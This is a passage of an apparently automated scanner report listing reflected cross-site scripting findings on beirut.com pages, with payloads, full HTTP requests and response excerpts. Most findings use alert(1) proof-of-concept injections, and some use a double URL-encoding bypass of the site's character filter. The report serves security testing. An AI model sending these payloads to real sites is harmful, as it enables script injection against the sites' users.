Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='59957f8ae';alert(1)//3e321c74abf';
var showfacebox='';
</script>
...[SNIP]...

4.1125. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a155d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e708b90da5ae was submitted in the REST URL parameter 4. This input was echoed as a155d"><script>alert(1)</script>708b90da5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995a155d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e708b90da5ae HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=5995a155d"><script>alert(1)</script>708b90da5ae&randstyle=magenta">
...[SNIP]...

4.1126. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416d1"><a>efbbf2edf38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo416d1"><a>efbbf2edf38/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:43:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo416d1"><a>efbbf2edf38/Parties&listingtype=events.php&Types=">
...[SNIP]...

4.1127. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f200c'-alert(1)-'f9ca2a5a0b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDof200c'-alert(1)-'f9ca2a5a0b0/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDof200c'-alert(1)-'f9ca2a5a0b0/Parties';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1128. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9324b'-alert(1)-'3612c4b09db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Parties9324b'-alert(1)-'3612c4b09db/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Parties9324b'-alert(1)-'3612c4b09db';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1129. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52bc1"><a>82184636b63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Parties52bc1"><a>82184636b63/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:58:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo/Parties52bc1"><a>82184636b63&listingtype=events.php&Types=6">
...[SNIP]...

4.1130. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a87"><a>c5a6cc85e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo33a87"><a>c5a6cc85e3c/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:42:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDo33a87"><a>c5a6cc85e3c/Performances&listingtype=events.php&Types=">
...[SNIP]...

4.1131. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d5b'-alert(1)-'7c878119254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDoa0d5b'-alert(1)-'7c878119254/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDoa0d5b'-alert(1)-'7c878119254/Performances';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1132. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92494"><a>45b1a71f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Performances92494"><a>45b1a71f2/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Performances92494"><a>45b1a71f2&listingtype=events.php&Types=17">
...[SNIP]...

4.1133. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 659ba'-alert(1)-'5d6526146cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Performances659ba'-alert(1)-'5d6526146cc/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:04:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo/Performances659ba'-alert(1)-'5d6526146cc';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1134. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 807bf%2527%253balert%25281%2529%252f%252f80b93cb571a was submitted in the REST URL parameter 4. This input was echoed as 807bf';alert(1)//80b93cb571a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081807bf%2527%253balert%25281%2529%252f%252f80b93cb571a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='6081807bf';alert(1)//80b93cb571a';
var showfacebox='';
</script>
...[SNIP]...

4.1135. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd56%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea282f73a450 was submitted in the REST URL parameter 4. This input was echoed as ddd56"><script>alert(1)</script>a282f73a450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081ddd56%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea282f73a450 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:40:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6081ddd56"><script>alert(1)</script>a282f73a450&randstyle=green">
...[SNIP]...

4.1136. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69c16'-alert(1)-'c728d544247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo69c16'-alert(1)-'c728d544247/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:01:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo69c16'-alert(1)-'c728d544247/Screenings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1137. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
